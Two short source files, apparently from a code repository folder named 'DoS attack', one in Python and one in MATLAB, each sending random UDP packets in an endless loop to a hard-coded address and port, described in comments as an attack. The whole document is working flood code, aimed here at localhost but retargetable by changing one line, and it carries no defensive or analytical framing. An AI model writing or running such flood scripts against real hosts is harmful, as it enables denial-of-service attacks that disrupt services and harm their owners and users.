File: PYTHON/DoS attack/dos_attack.py
import socket #Imports needed libraries
import random

sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #Creates a socket
bytes=random._urandom(1024) #Creates packet
ip = '127.0.0.1' #The IP we are attacking
port= 4012 #Port we direct to attack
sent=0
while 1:#Infinitely loops to send packets to the port until the program is exited
    sock.sendto(bytes,(ip,port))
    print ("packet sent ", sent)
    sent= sent + 1

File: PYTHON/DoS attack/DoS_attack.m
% Flood attack between the host and an agent
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%echoudp('off');

%echoudp('on',4012);
%get the IP we are attacking
ip = '127.0.0.1';

%get thep port we direct to attack
port = 4012;

%Creates a udp object
u = udp(ip,'RemotePort',port,'LocalPort',4013);

u.EnablePortSharing = 'on';

fopen(u);

%Use infinitely loops to send lots of packets to the port till the program
%is exited
i=1;
while 1
   packet = randi(10000,1,100);
   fwrite(u,packet);
   disp(i);
   i = i+1;
   %disp(packet);
end

fclose(u);
echoudp('off');